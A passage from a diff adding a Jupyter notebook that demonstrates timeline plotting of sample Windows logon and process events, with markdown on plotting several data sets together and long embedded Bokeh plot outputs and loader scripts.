rtsWin1\\\\adm1nistrator\"],\"LogonType\":[3],\"TargetLogonId\":[\"0xfb5ee6\"],\"TimeGenerated\":{\"__ndarray__\":\"ALAP9P6EdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1]},\"index\":[2],\"y_index\":[0]},\"selected\":{\"id\":\"3038\"},\"selection_policy\":{\"id\":\"3039\"}},\"id\":\"2925\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"3047\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"3000\"},\"major_label_policy\":{\"id\":\"3033\"},\"ticker\":{\"id\":\"2941\"}},\"id\":\"2940\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"source\":{\"id\":\"3021\"}},\"id\":\"3025\",\"type\":\"CDSView\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"2953\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"3051\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"2927\"}},\"id\":\"3018\",\"type\":\"CDSView\"},{\"attributes\":{\"text\":\"Timeline: Processes with marker\"},\"id\":\"2930\",\"type\":\"Title\"}],\"root_ids\":[\"3027\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"3f85b9af-f51a-4b7f-bf27-e5ba59c7307b\",\"root_ids\":[\"3027\"],\"roots\":{\"3027\":\"3cac20eb-48ba-418b-a985-f8ae50ba1330\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "3027"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "fake_alert = processes_on_host.sample().iloc[0]\r\n",
+    "\r\n",
+    "display_timeline(\r\n",
+    "    host_logons,\r\n",
+    "    title=\"Processes with marker\",\r\n",
+    "    group_by=\"LogonType\",\r\n",
+    "    source_columns=[\"Account\", \"TargetLogonId\", \"LogonType\"],\r\n",
+    "    alert=fake_alert,\r\n",
+    "    legend=\"left\",\r\n",
+    ");"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Plotting series from different data sets\r\n",
+    "When you want to plot data sets with different schema on the same plot it is difficult to put them in a single DataFrame.\r\n",
+    "To do this we need to assemble the different data sets into a dictionary and pass that to the `display_timeline`\r\n",
+    "\r\n",
+    "The dictionary has this format:\r\n",
+    "\r\n",
+    "Key: str\r\n",
+    "    Name of data set to be displayed in legend\r\n",
+    "    \r\n",
+    "Value: dict, the value holds the settings for each data series:\r\n",
+    "\r\n",
+    "    data: pd.DataFrame\r\n",
+    "        Data to plot\r\n",
+    "    time_column: str, optional\r\n",
+    "        Name of the timestamp column\r\n",
+    "        (defaults to `time_column` function parameter)\r\n",
+    "    source_columns: list[str], optional\r\n",
+    "        List of source columns to use in tooltips\r\n",
+    "        (defaults to `source_columns` function parameter)\r\n",
+    "    color: str, optional\r\n",
+    "        Color of datapoints for this data\r\n",
+    "        (defaults to autogenerating colors)\r\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-01-30T20:46:29.523588Z",
+     "start_time": "2020-01-30T20:46:29.430641Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"3286\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"3286\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"3286\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"56ac7278-7683-4c3e-98af-13cc19b42508\" data-root-id=\"3371\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"42d79317-ace3-4f24-8ee2-14d0dcf2277d\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"3290\"},{\"id\":\"3322\"}]},\"id\":\"3371\",\"type\":\"Column\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3343\",\"type\":\"Circle\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"3393\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"3409\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"3395\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"3339\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"3410\",\"type\":\"YearsTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"3396\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"below\":[{\"id\":\"3301\"}],\"center\":[{\"id\":\"3304\"},{\"id\":\"3308\"}],\"height\":300,\"left\":[{\"id\":\"3305\"},{\"id\":\"3370\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"3361\"},{\"id\":\"3367\"}],\"title\":{\"id\":\"3291\"},\"toolbar\":{\"id\":\"3315\"},\"width\":900,\"x_range\":{\"id\":\"3293\"},\"x_scale\":{\"id\":\"3297\"},\"y_range\":{\"id\":\"3295\"},\"y_scale\":{\"id\":\"3299\"}},\"id\":\"3290\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"3312\",\"type\":\"SaveTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3359\",\"type\":\"Scatter\"},{\"attributes\":{\"fill_color\":{\"value\":\"#440154\"},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3342\",\"type\":\"Circle\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"3394\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"3309\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"3352\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"axis\":{\"id\":\"3301\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"3304\",\"type\":\"Grid\"},{\"attributes\":{\"label\":{\"value\":\"Processes\"},\"renderers\":[{\"id\":\"3361\"}]},\"id\":\"3363\",\"type\":\"LegendItem\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"3408\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"text\":\"Timeline: Logons and Processes\"},\"id\":\"3291\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"3327\",\"type\":\"DataRange1d\"},{\"attributes\":{\"axis\":{\"id\":\"3305\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"3308\",\"type\":\"Grid\"},{\"attributes\":{\"overlay\":{\"id\":\"3352\"},\"x_range\":{\"id\":\"3293\"},\"y_range\":null},\"id\":\"3351\",\"type\":\"RangeTool\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"3399\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"3397\",\"type\":\"YearsTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"3390\",\"type\":\"DaysTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"3288\"},\"glyph\":{\"id\":\"3347\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3348\"},\"view\":{\"id\":\"3350\"}},\"id\":\"3349\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"label\":{\"value\":\"Logons\"},\"renderers\":[{\"id\":\"3367\"}]},\"id\":\"3369\",\"type\":\"LegendItem\"},{\"attributes\":{\"source\":{\"id\":\"3288\"}},\"id\":\"3350\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"3306\",\"type\":\"BasicTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"3392\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"3311\",\"type\":\"ResetTool\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"3386\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"3356\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"3400\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3360\",\"type\":\"Scatter\"},{\"attributes\":{\"end\":1.5,\"start\":-0.5},\"id\":\"3295\",\"type\":\"Range1d\"},{\"attributes\":{\"formatter\":{\"id\":\"3376\"},\"major_label_policy\":{\"id\":\"3374\"},\"ticker\":{\"id\":\"3306\"},\"visible\":false},\"id\":\"3305\",\"type\":\"LinearAxis\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"3401\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"3391\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"3356\"},\"major_label_policy\":{\"id\":\"3377\"},\"ticker\":{\"id\":\"3302\"}},\"id\":\"3301\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"3297\",\"type\":\"LinearScale\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"3402\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"3389\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"3405\",\"type\":\"DaysTicker\"},{\"attributes\":{\"data\":{\"Account\":[\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlerts